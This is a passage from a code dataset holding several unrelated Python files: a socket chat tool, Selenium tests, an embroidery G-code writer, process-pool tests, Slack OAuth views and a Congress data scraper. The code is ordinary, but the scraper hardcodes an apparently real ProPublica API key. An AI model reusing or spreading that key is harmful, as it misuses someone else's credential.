\n\nElementTree(indent(top)).write(dst)\n\n","sub_path":"qgis/3.4/src/scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"367858923","text":"import socket, sys, select, argparse, signal\n\n\"\"\"\nthis function exits the program\n\"\"\"\ndef exit_program():\n\tlisten_socket.close()\n\texit(0)\n\n\"\"\"\nthis function handles CTRL+C\n\"\"\"\ndef sigint_handler(signum, frame):\n\texit_program()\n\nsignal.signal(signal.SIGINT, sigint_handler)\n\nparser = argparse.ArgumentParser()\n# list of possible arguments\nparser.add_argument(\"-s\", dest=\"wait\", action=\"store_true\", default=False)\nparser.add_argument(\"-p\", dest=\"port\")\nparser.add_argument(\"-c\", dest=\"hostname\")\n# collect all the arguments from the parser\nargs = parser.parse_args()\n\nlisten_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nif args.wait is True:\n\tlisten_socket.bind(('', int(args.port)))\n\tlisten_socket.listen(1)\nelse:\n\tlisten_socket.connect((args.hostname, int(args.port)))\n\nconnected_clients = []\nconnected_client = None\nis_connected = False\n\nwhile True:\n\tread_list = [sys.stdin, listen_socket] + connected_clients\n\t(ready_list, _, _) = select.select(read_list, [], [])\n\n\tfor ready in ready_list:\n\t\tif ready is listen_socket and args.wait is True:\n\t\t\tif is_connected is True:\n\t\t\t\tdata = ready.recv(1024)\n\t\t\t\tif len(data) == 0:\n\t\t\t\t\texit_program()\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write(\"%s\\n\" % data.rstrip())\n\t\t\telse:\n\t\t\t\tconnected_client, addr = ready.accept()\n\t\t\t\tconnected_clients.append(connected_client)\n\t\t\tis_connected = True\n\t\telif ready is sys.stdin:\n\t\t\tmessage = raw_input()\n\t\t\tif args.wait is True:\n\t\t\t\tconnected_client.send(message)\n\t\t\telse:\n\t\t\t\tlisten_socket.send(message)\n\t\telse:\n\t\t\tdata = ready.recv(1024)\n\t\t\tif len(data) == 0:\n\t\t\t\texit_program()\n\t\t\telse:\n\t\t\t\tsys.stdout.write(\"%s\\n\" % 
data.rstrip())","sub_path":"hw1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"382920411","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom pageobject.base import BasePage\nimport time\n\nclass Login_AdminUsername2(BasePage):\n # 管理员用户登录\n # 进入默认板块\n # 选择要删除的帖子,并单击删除\n def del_message_page(self):\n sel_del_message=(By.CSS_SELECTOR,'form table tbody tr .o input')\n del_message = (By.CSS_SELECTOR, 'form div p strong a')\n confirm_button=(By.CSS_SELECTOR, '.o .pn span')\n time.sleep(2)\n self.change_window()\n self.click(*sel_del_message)\n time.sleep(2)\n self.click(*del_message)\n time.sleep(2)\n self.click(*confirm_button)\n # 进入版块管理(管理中心 - -论坛)\n adminpage = (By.LINK_TEXT, '管理中心')\n self.click(*adminpage)\n def admin_page(self):\n # psw_page=(By.CSS_SELECTOR,'.loginform .txt') # 重新登录\n # admin_submit=(By.CSS_SELECTOR,'.loginnofloat .btn')\n click_discuz = (By.ID, 'header_forum') # 进入论坛\n\n self.change_window()\n time.sleep(5)\n # self.clear(*psw_page)\n # self.sendkeys(cx_psw,*psw_page) # 重新登录\n # time.sleep(2)\n # self.click( *admin_submit)\n time.sleep(10)\n self.change_window()\n self.click(*click_discuz)\n # 创建新的版块\n def new_block_page(self,newblock):\n new_block=(By.CSS_SELECTOR,'.lastboard .addtr') #添加新板块\n new_block_name=(By.NAME,'newforum[1][]') #创建新的板块\n new_block_submit=(By.CSS_SELECTOR,'.fixsel .btn') #提交\n time.sleep(5)\n self.change_window()\n self.enter_iframe()\n self.click(*new_block)\n time.sleep(5)\n time.sleep(2)\n self.clear(*new_block_name)\n self.sendkeys(newblock, *new_block_name)\n self.click(*new_block_submit)\n close_new_page = (By.CSS_SELECTOR, '.uinfo a') # 关闭新的页面\n time.sleep(5)\n self.change_window()\n self.click(*close_new_page)\n # 管理员退出\n # 普通用户登录\n # 在新的版块下发帖\n def new_block_message(self):\n new_block = (By.CSS_SELECTOR, '.fl_tb tr:nth-last-child(2) td h2 a')\n time.sleep(2)\n self.click(*new_block)\n # 发帖\n # 回复帖子","sub_path":"baidu01/pageobject/discuz2_page.py","file_name":"discuz2_page.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"594492509","text":"try:\n\timport webcolors\nexcept ImportError:\n\tprint('''Module \"webcolors\" not found. 
\nThis module enables better thread color names.\nInstall with \npython -m pip install webcolors''')\n\n\n\tclass webcolors:\n\t\t@staticmethod\n\t\tdef hex_to_name(name):\n\t\t\treturn name\n\nfrom .EmbConstant import *\nfrom .WriteHelper import write_string_utf8\n\nSTRIP_SPEEDS = True\nSEQUIN_CONTINGENCY = CONTINGENCY_SEQUIN_STITCH\nMAX_JUMP_DISTANCE = float('inf')\nMAX_STITCH_DISTANCE = float('inf')\n\n\ndef write(pattern, f, settings=None):\n\tif settings is None:\n\t\tsettings = {}\n\n\tflip_x = settings.get('flip_x', False)\n\tflip_y = settings.get('flip_y', True)\n\tstitch_z_travel = settings.get('stitch_z_travel', 3.6)\n\tstitch_z_thread_free = settings.get('stitch_z_thread_free', 0.1)\n\tis_drilling = settings.get('drilling_cycle', False)\n\tfeed_rate = settings.get('feed_rate', -1)\n\n\tstitch_z_travel -= stitch_z_thread_free\n\tif stitch_z_travel < 0:\n\t\tstitch_z_travel = 0\n\n\t# pyembroidery natively uses tenths of a millimeter\n\textents = [extent / 10.0 for extent in pattern.extents()]\n\twidth = extents[2] - extents[0]\n\theight = extents[3] - extents[1]\n\n\theader_block(f, feed_rate, pattern.count_stitches())\n\n\tz = 0\n\tstitching = False\n\tthread_id = -1\n\tthread_list = pattern.threadlist\n\tnum_col_changes = 0\n\tfor x, y, command in pattern.stitches:\n\t\tif command == COLOR_CHANGE:\n\t\t\tnum_col_changes += 1\n\n\tfor x, y, command in pattern.stitches:\n\t\t# embroidery G-code discussion: https://github.com/inkstitch/inkstitch/issues/335\n\t\tif x is not None:\n\t\t\tif flip_x:\n\t\t\t\tx = -x\n\t\t\t# pyembroidery natively uses tenths of a millimeter\n\t\t\tx /= 10.0\n\t\tif y is not None:\n\t\t\tif flip_y:\n\t\t\t\ty = -y\n\t\t\t# pyembroidery natively uses tenths of a millimeter\n\t\t\ty /= 10.0\n\n\t\tif command == COLOR_CHANGE:\n\t\t\tif thread_id < 0:\n\t\t\t\tthread_id = 0\n\t\t\tswitch_thread(f, thread_id, thread_list)\n\t\t\tthread_id += 1\n\n\t\tif command == JUMP:\n\t\t\tif thread_id < 0:\n\t\t\t\tthread_id = 0 if num_col_changes < len(thread_list) else -1\n\t\t\t\tswitch_thread(f, thread_id, thread_list)\n\t\t\t\tthread_id += 1\n\t\t\twrite_string_utf8(f, \"G0 X%.3f Y%.3f\\r\\n\" % (x, y))\n\n\t\tif command == STITCH:\n\t\t\tif thread_id < 0:\n\t\t\t\tthread_id = 0 if num_col_changes < len(thread_list) else -1\n\t\t\t\tswitch_thread(f, thread_id, thread_list)\n\t\t\t\tthread_id += 1\n\t\t\tif is_drilling:\n\t\t\t\twrite_string_utf8(f, \"G80 X%.3f Y%.3f Z%.3f R%.3f (stitch cycle)\\r\\n\" % (x, y, stitch_z_travel, stitch_z_thread_free))\n\t\t\telse:\n\t\t\t\tzcmd = ''\n\t\t\t\tif stitch_z_thread_free > 0:\n\t\t\t\t\tz += stitch_z_thread_free\n\t\t\t\t\tzcmd = \" Z%.3f\" % z\n\t\t\t\twrite_string_utf8(f, \"G1 X%.3f Y%.3f%s\\r\\n\" % (x, y, zcmd))\n\t\t\t\tif stitch_z_travel > 0:\n\t\t\t\t\tz += stitch_z_travel\n\t\t\t\t\twrite_string_utf8(f, \"G1 Z%.1f\\r\\n\" % z)\n\tfooter_block(f)\n\n\ndef footer_block(f):\n\twrite_string_utf8(f, \"(Block-name: Footer)\\r\\n\");\n\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\");\n\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\");\n\twrite_string_utf8(f, \"G0 X0.0 Y0.0 (Go to origin)\\r\\n\")\n\twrite_string_utf8(f, \"M18 (Disable all stepper motors)\\r\\n\")\n\twrite_string_utf8(f, \"M30 (End of program)\\r\\n\")\n\n\ndef header_block(f, feed_rate=-1, num_stitches=-1):\n\twrite_string_utf8(f, \"(Block-name: Header)\\r\\n\")\n\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\")\n\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\")\n\tif num_stitches > 0:\n\t\twrite_string_utf8(f, '(STITCH_COUNT:%d)\\r\\n' % 
num_stitches)\n\twrite_string_utf8(f, '(EXTENTS_LEFT:[xmin])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_TOP:[ymin])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_RIGHT:[xmax])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_BOTTOM:[ymax])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_WIDTH:[xmax-xmin])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_HEIGHT:[ymax-ymin])\\r\\n')\n\twrite_string_utf8(f, \"G90 (use absolute coordinates)\\r\\n\")\n\twrite_string_utf8(f, \"G21 (coordinates will be specified in millimeters)\\r\\n\")\n\twrite_string_utf8(f, \"G92 X0.0 Y0.0 Z0.0 (current position is the origin)\\r\\n\")\n\tif feed_rate > 0:\n\t\twrite_string_utf8(f, \"G1 X0.0 Y0.0 F%d\\r\\n\" % (feed_rate))\n\t\twrite_string_utf8(f, \"G0 X0.0 Y0.0 F%d\\r\\n\" % (feed_rate))\n\twrite_string_utf8(f, \"\\r\\n\")\n\n\ndef closest_colour(requested_colour):\n\trequested_colour = webcolors.hex_to_rgb(requested_colour)\n\tmin_colours = {}\n\tfor key, name in webcolors.css3_hex_to_names.items():\n\t\tr_c, g_c, b_c = webcolors.hex_to_rgb(key)\n\t\trd = (r_c - requested_colour[0]) ** 2\n\t\tgd = (g_c - requested_colour[1]) ** 2\n\t\tbd = (b_c - requested_colour[2]) ** 2\n\t\tmin_colours[(rd + gd + bd)] = name\n\treturn min_colours[min(min_colours.keys())]\n\n\ndef get_colour_name(requested_colour):\n\ttry:\n\t\tclosest_name = actual_name = webcolors.hex_to_name(requested_colour)\n\texcept ValueError:\n\t\tclosest_name = closest_colour(requested_colour)\n\t\tactual_name = None\n\treturn actual_name, closest_name\n\n\ndef dump_thread_data(f, selected_thread):\n\tthread_attrs = [a for a in dir(selected_thread) if not a.startswith('__') and not callable(getattr(selected_thread, a))]\n\tfor variable in thread_attrs:\n\t\tif variable.upper() == 'COLOR':\n\t\t\t_, thread_color = get_colour_name(selected_thread.hex_color())\n\t\t\tvarvalue = thread_color.title() + ' <' + selected_thread.hex_color() + '>'\n\t\telse:\n\t\t\tvarvalue = getattr(selected_thread, variable)\n\t\t\tif varvalue == 'None':\n\t\t\t\tvarvalue = None\n\t\tif varvalue:\n\t\t\treadable = variable.replace('_', ' ').capitalize().strip()\n\t\t\tif readable:\n\t\t\t\twrite_string_utf8(f, '(%s: %s)\\r\\n' % (readable, varvalue))\n\n\ndef switch_thread(f, thread_id, threads_list):\n\tif thread_id < 0:\n\t\tthread_id = len(threads_list)\n\tif len(threads_list) <= thread_id:\n\t\twrite_string_utf8(f, \"(Block-name: Default Thread)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\")\n\telse:\n\t\tselected_thread = threads_list[thread_id]\n\t\t_, thread_color = get_colour_name(selected_thread.hex_color())\n\t\tthread_desc = \", Color: %s\" % thread_color.title()\n\t\tif selected_thread.catalog_number == 'None':\n\t\t\tselected_thread.catalog_number = None\n\t\tthread_desc += (', Catalog number: %s' % selected_thread.catalog_number) if selected_thread.catalog_number else \"\"\n\t\twrite_string_utf8(f, \"(Block-name: Thread #%d%s)\\r\\n\" % (thread_id, thread_desc))\n\t\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-color: %s)\\r\\n\" % selected_thread.hex_color())\n\t\tdump_thread_data(f, selected_thread)\n\t\twrite_string_utf8(f, \"%wait\\r\\n\")\n\t\tthread_catalog_id = (\",ID:%s\"%selected_thread.catalog_number) if selected_thread.catalog_number else \"\"\n\t\twrite_string_utf8(f, \"%%msg (Change%d)New color:%s%s\\r\\n\" % (thread_id, thread_color.title(),thread_catalog_id))\n\t\twrite_string_utf8(f, \"M0 
(pause)\\r\\n\")\n","sub_path":"pyembroidery/GcodebCNCWriter.py","file_name":"GcodebCNCWriter.py","file_ext":"py","file_size_in_byte":6566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"334749419","text":"# -*- coding: utf-8 -*-\nfrom mongoengine import *\n\n\nclass User(Document):\n \"\"\"class representing a Twitter user\"\"\"\n name = StringField(max_length=100, required=True, db_field='name')\n screen_name = StringField(max_length=100, required=True, db_field='screen_name')\n location = StringField(max_length=100, db_field='location')\n followers_count = IntField(db_field='followers_count')\n friends_count = IntField(db_field='friends_count')\n created_at = DateTimeField(db_field='created_ad')\n statuses_count = IntField(db_field='statuses_count')\n profile_image_url = URLField(db_field='profile_image_url')\n description = StringField(db_field='description')\n lang = StringField(db_field='lang')\n tweets = ListField(EmbeddedDocumentField('Tweet'))\n\n meta = {'collection': 'users'}\n\n def __unicode__(self):\n return '%s (@%s)' % (self.name, self.screen_name)\n\n\nclass Entity(Document):\n \"\"\"class representing an entity of a tweet\"\"\"\n hashtags = ListField(EmbeddedDocumentField('Hashtag'))\n user_mentions = ListField(EmbeddedDocumentField('UserMention'))\n urls = ListField(EmbeddedDocumentField('URL'))\n\n\nclass Tweet(Document):\n \"\"\"Class representing a tweet made by a user\"\"\"\n created_at = DateTimeField(db_field='created_at')\n tweet_id = LongField(db_field='id')\n text = StringField(db_field='text')\n retweet_count = IntField(db_field='retweet_count')\n favorite_count = IntField(db_field='favorite_count')\n entities = EmbeddedDocumentField('Entity')\n\n\nclass Hashtag(Document):\n \"\"\"class representing a hashtag which is an entity\"\"\"\n text = StringField(db_field='text')\n indices = ListField(db_field='indices')\n\n\nclass UserMention(Document):\n \"\"\"class representing a user mention which is part of an entity\"\"\"\n screen_name = StringField(db_field='screen_name')\n name = StringField(db_field='name')\n mention_id = StringField(db_field='id_str')\n indices = ListField(db_field='indices')\n\n\nclass URL(Document):\n \"\"\"class representing which is part of an entity\"\"\"\n url = URLField(db_field='url')\n expanded_url = URLField(db_field='expanded_url')\n display_url = URLField(db_field='display_url')\n indices = ListField(db_field='indices')\n","sub_path":"public/SocialMediaAnalysis/SMAapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"614969437","text":"from PyQt5 import QtWidgets, uic\nimport sys\n\n#Variables\nglobal chosenApps\nchosenApps = []\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__()\n uic.loadUi('form.ui', self)\n self.setWindowTitle(\"Welcome to IXOS\")\n self.show()\n self.button = self.findChild(QtWidgets.QPushButton, 'b1')\n self.button.clicked.connect(self.printButtonPressed)\n\n def printButtonPressed(self):\n # This is executed when the button is pressed\n print('printButtonPressed')\n dialog = DialogUi()\n dialog.exec_()\n try:\n if acceptedTos:\n print(\"Continue to app selection\")\n self.close()\n dialog = AppDialogUi()\n dialog.exec_()\n except Exception as e:\n print(\"Error occured, showing error dialogue!\\n\",e)\n\n\nclass DialogUi(QtWidgets.QDialog):\n def __init__(self):\n super(DialogUi, 
self).__init__()\n uic.loadUi('dialog.ui', self)\n self.setWindowTitle(\"Accept TOS\")\n self.button = self.findChild(QtWidgets.QPushButton, 'accept')\n self.button.clicked.connect(self.acceptButtonPressed)\n self.button2 = self.findChild(QtWidgets.QPushButton, 'cancel')\n self.button2.clicked.connect(self.cancelButtonPressed)\n self.show()\n\n def acceptButtonPressed(self):\n # This is executed when the button is pressed\n print('acceptButtonPressed')\n global acceptedTos\n acceptedTos = True\n print(acceptedTos)\n self.close()\n\n def cancelButtonPressed(self):\n # This is executed when the button is pressed\n print('cancelButtonPressed')\n self.close()\n\nclass AppDialogUi(QtWidgets.QDialog):\n def __init__(self):\n super(AppDialogUi, self).__init__()\n uic.loadUi('appdialog.ui', self)\n self.setWindowTitle(\"Select Applications\")\n self.button = self.findChild(QtWidgets.QPushButton, 'continue_2')\n self.button.clicked.connect(self.continueButtonPressed)\n self.button2 = self.findChild(QtWidgets.QPushButton, 'cancel')\n self.button2.clicked.connect(self.cancelButtonPressed)\n self.show()\n\n def continueButtonPressed(self):\n # This is executed when the button is pressed\n print('continueButtonPressed')\n\n self.close()\n\n def cancelButtonPressed(self):\n # This is executed when the button is pressed\n print('cancelButtonPressed')\n self.close()\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_()\n\n","sub_path":"greeter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468895579","text":"#\n# This source file is part of the EdgeDB open source project.\n#\n# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nimport asyncio\nimport os\nimport signal\nimport tempfile\n\nimport uvloop\n\nfrom edb.server import _testbase as tb\nfrom edb.server2 import procpool\nfrom edb.lang.common import taskgroup\n\n\nclass MyExc(Exception):\n pass\n\n\nclass Worker:\n\n def __init__(self, o):\n self._o = o\n self._i = 0\n\n async def test1(self, t):\n self._i += 1\n await asyncio.sleep(t)\n return self._i\n\n async def test2(self):\n return self._o\n\n async def test3(self):\n 1 / 0\n\n async def test4(self):\n e = MyExc()\n e.special = 'spam'\n raise e\n\n async def test5(self):\n class WillCrashPickle(Exception):\n pass\n raise WillCrashPickle\n\n\nclass TestProcPool(tb.TestCase):\n\n @classmethod\n def setUpClass(cls):\n asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n super().setUpClass()\n\n @classmethod\n def tearDownClass(cls):\n try:\n super().tearDownClass()\n finally:\n asyncio.set_event_loop_policy(None)\n\n def setUp(self):\n self._dir = tempfile.TemporaryDirectory()\n self.runstate_dir = self._dir.name\n\n def tearDown(self):\n self._dir.cleanup()\n self._dir = None\n\n async def test_procpool_1(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n 
min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_1')\n\n try:\n i1 = asyncio.create_task(pool.call('test1', 0.1))\n i2 = asyncio.create_task(pool.call('test1', 0.05))\n\n i1 = await i1\n i2 = await i2\n\n self.assertEqual(i1, 1)\n self.assertEqual(i2, 2)\n finally:\n await pool.stop()\n\n async def test_procpool_2(self):\n pool = await procpool.create_pool(\n max_capacity=5,\n min_capacity=5,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_2')\n\n try:\n tasks = []\n for i in range(20):\n tasks.append(asyncio.create_task(pool.call('test1', 0.1)))\n\n await asyncio.gather(*tasks)\n finally:\n await pool.stop()\n\n results = [t.result() for t in tasks]\n self.assertEqual(results, [\n 1, 1, 1, 1, 1,\n 2, 2, 2, 2, 2,\n 3, 3, 3, 3, 3,\n 4, 4, 4, 4, 4\n ])\n\n async def test_procpool_3(self):\n pool = await procpool.create_pool(\n max_capacity=5,\n min_capacity=5,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_3')\n\n try:\n r = await pool.call('test2')\n finally:\n await pool.stop()\n\n self.assertEqual(r, [123])\n\n async def test_procpool_4(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_4')\n\n try:\n with self.assertRaises(ZeroDivisionError):\n await pool.call('test3')\n\n self.assertEqual(await pool.call('test1', 0.1), 1)\n\n with self.assertRaises(ZeroDivisionError):\n await pool.call('test3')\n\n self.assertEqual(await pool.call('test1', 0.1), 2)\n\n finally:\n await pool.stop()\n\n async def test_procpool_5(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_5')\n\n try:\n t1 = asyncio.create_task(pool.call('test3'))\n t2 = asyncio.create_task(pool.call('test1', 0.1))\n t3 = asyncio.create_task(pool.call('test3'))\n t4 = asyncio.create_task(pool.call('test1', 0.1))\n\n await asyncio.gather(t1, t2, t3, t4, return_exceptions=True)\n\n with self.assertRaises(ZeroDivisionError):\n await t1\n with self.assertRaises(ZeroDivisionError):\n await t3\n\n self.assertEqual(t2.result(), 1)\n self.assertEqual(t4.result(), 2)\n\n finally:\n await pool.stop()\n\n async def test_procpool_6(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_6')\n\n try:\n with self.assertRaises(MyExc) as e:\n await pool.call('test4')\n\n self.assertEqual(e.exception.special, 'spam')\n\n finally:\n await pool.stop()\n\n async def test_procpool_7(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_7')\n\n try:\n with self.assertRaisesRegex(RuntimeError, 'pickle local object'):\n await pool.call('test5')\n\n self.assertEqual(await pool.call('test1', 0.1), 1)\n\n finally:\n await pool.stop()\n\n async def test_procpool_8(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_8')\n\n worker = next(pool.manager.iter_workers())\n pid = worker.get_pid()\n\n try:\n t = asyncio.create_task(pool.call('test1', 10))\n await 
asyncio.sleep(0.1)\n\n os.kill(pid, signal.SIGTERM)\n\n with self.assertRaisesRegex(ConnectionError,\n 'lost connection to the worker'):\n await t\n\n self.assertEqual(await pool.call('test1', 0.1), 1)\n\n finally:\n await pool.stop()\n\n async def test_procpool_9(self):\n pool = await procpool.create_pool(\n max_capacity=10,\n min_capacity=1,\n gc_interval=0.01,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_9')\n\n try:\n async with taskgroup.TaskGroup() as g:\n for _ in range(100):\n g.create_task(pool.call('test1', 0.1))\n\n await asyncio.sleep(1)\n await pool.call('test1', 0.1)\n\n finally:\n await pool.stop()\n\n async def test_procpool_10(self):\n pool = await procpool.create_pool(\n max_capacity=10,\n min_capacity=2,\n gc_interval=0.01,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_10')\n\n manager = pool.manager\n\n try:\n async with taskgroup.TaskGroup() as g:\n for _ in range(100):\n g.create_task(pool.call('test1', 0.1))\n\n await asyncio.sleep(0.5)\n\n self.assertEqual(manager._stats_spawned, 10)\n self.assertEqual(manager._stats_killed, 8)\n\n w1 = await pool.acquire()\n w2 = await pool.acquire()\n w3 = await pool.acquire()\n\n await asyncio.sleep(0.5)\n\n self.assertEqual(manager._stats_spawned, 11)\n self.assertEqual(manager._stats_killed, 8)\n\n await w1.call('test1', 0.1)\n await w2.call('test1', 0.1)\n await w3.call('test1', 0.1)\n\n self.assertEqual(manager._stats_spawned, 11)\n self.assertEqual(manager._stats_killed, 8)\n\n finally:\n await pool.stop()\n\n self.assertEqual(manager._stats_spawned, 11)\n self.assertEqual(manager._stats_killed, 11)\n","sub_path":"tests/test_server_procpool.py","file_name":"test_server_procpool.py","file_ext":"py","file_size_in_byte":8933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"319246266","text":"import sys\nimport json\nimport urllib\nimport os.path\nimport requests\n\n\ndef getUnitedStatesCongress():\n url = 'https://api.propublica.org/congress/v1/'\n x_api_key = 'LDvokyM6kvfKBSNyq153Gk13UGfAuPxs7qtjekyv'\n current = 115\n headers = {\n 'X-API-Key': x_api_key\n }\n congress = {}\n chambers = ['house', 'senate']\n for chamber in chambers:\n chamberURL = url + str(current) + '/' + chamber + '/members.json'\n print(chamberURL)\n r = requests.get(url=chamberURL, headers=headers).json()\n status = r['status']\n if status == 'OK':\n results = r['results']\n result = results[0]\n if 'members' in result:\n members = result['members']\n index = 0\n total = len(members)\n for member in members:\n member_id = member['id']\n image_url = 'https://raw.githubusercontent.com/unitedstates/images/gh-pages/congress/original/' + member_id + '.jpg'\n members[index]['image'] = image_url\n image_path = './images/' + chamber + '/' + member_id + '.jpg'\n image_exist = os.path.exists(image_path)\n if not image_exist:\n urllib.urlretrieve(image_url, image_path)\n index += 1\n print(chamber.upper())\n progress(index, total)\n congress[chamber] = members\n with open('./json/' + chamber + '.json', 'w') as jsonfile:\n json.dump(members, jsonfile)\n with open('./json/congress.json', 'w') as jsonfile:\n json.dump(congress, jsonfile)\n\n\ndef progress(count, total, status=''):\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n\n percents = round(100.0 * count / float(total), 1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n sys.stdout.write('[%s] %s%s ...%s\\n\\r' 
% (bar, percents, '%', status))\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n getUnitedStatesCongress()\n","sub_path":"dist/assets/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"44304278","text":"from uuid import uuid4\n\nfrom django.conf import settings\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import DetailView\n\nfrom heatherr.models import SlackAccount\n\nimport requests\n\n\ndef login_view(request):\n return render(request, \"account/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n messages.success(request, 'You have been logged out. See you again soon!')\n return redirect(reverse('accounts:login'))\n\n\n@login_required\ndef profile(request):\n request.session['authorize_state'] = uuid4().hex\n request.session['authorize_request_uri'] = '%s://%s%s' % (\n ('https' if request.is_secure() else 'http'),\n get_current_site(request).domain,\n reverse('accounts:authorize'))\n if request.user.slackaccount_set.exists():\n return render(request, \"account/profile.html\")\n return render(request, \"account/new_profile.html\")\n\n\n@login_required\ndef authorize(request):\n if request.session['authorize_state'] != request.GET['state']:\n return render(request, \"account/authorize_fail.html\", {\n \"error\": \"Invalid state token.\",\n })\n\n response = requests.post('https://slack.com/api/oauth.access', data={\n 'client_id': settings.SLACK_CLIENT_ID,\n 'client_secret': settings.SLACK_CLIENT_SECRET,\n 'code': request.GET['code'],\n 'redirect_uri': request.session['authorize_request_uri'],\n })\n data = response.json()\n\n account, created = SlackAccount.objects.update_or_create(\n user=request.user, team_id=data['team_id'], defaults={\n 'access_token': data['access_token'],\n 'scope': data['scope'],\n 'team_name': data['team_name'],\n 'incoming_webhook_url': data['incoming_webhook']['url'],\n 'incoming_webhook_channel': data['incoming_webhook']['channel'],\n 'incoming_webhook_configuration_url': (\n data['incoming_webhook']['configuration_url']),\n 'bot_user_id': data['bot']['bot_user_id'],\n 'bot_access_token': data['bot']['bot_access_token'],\n }\n )\n\n messages.success(request, \"Heatherr is now linked to %s.\" % (\n account.team_name,))\n return redirect(reverse('accounts:profile'))\n\n\nclass SlackAccountDetailView(DetailView):\n model = SlackAccount\n","sub_path":"heatherr/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486186676","text":"#coding=utf-8\nimport numpy as np\nimport scipy.io as sio\nimport math\n\n'''\nTODO\n用A跑regulardata 生成result116和118,116重新生成\nA1跑regulardata生成result121\n以及wforecast[0,2,5].npy\n\n'''\n\ndef get_database(w, timestamp, weekd, noweekd):\n\tfirst_timestamp = timestamp[0]\n\tsample_num = len(timestamp)\n\tdatabase = []\n\tfor i in range(48):\n\t\tdatabase.append([[],[]])\n\tdealed_sample = []\n\tfor i in range(sample_num-1):\n\t\thour = int((timestamp[i]-1475424000)/3600%24)\n\t\tweek = int(((timestamp[i]-1475424000)/3600/24+1)%7)\n\t\tif timestamp[i+1]-timestamp[i]==3600:\n\t\t\tif week in 
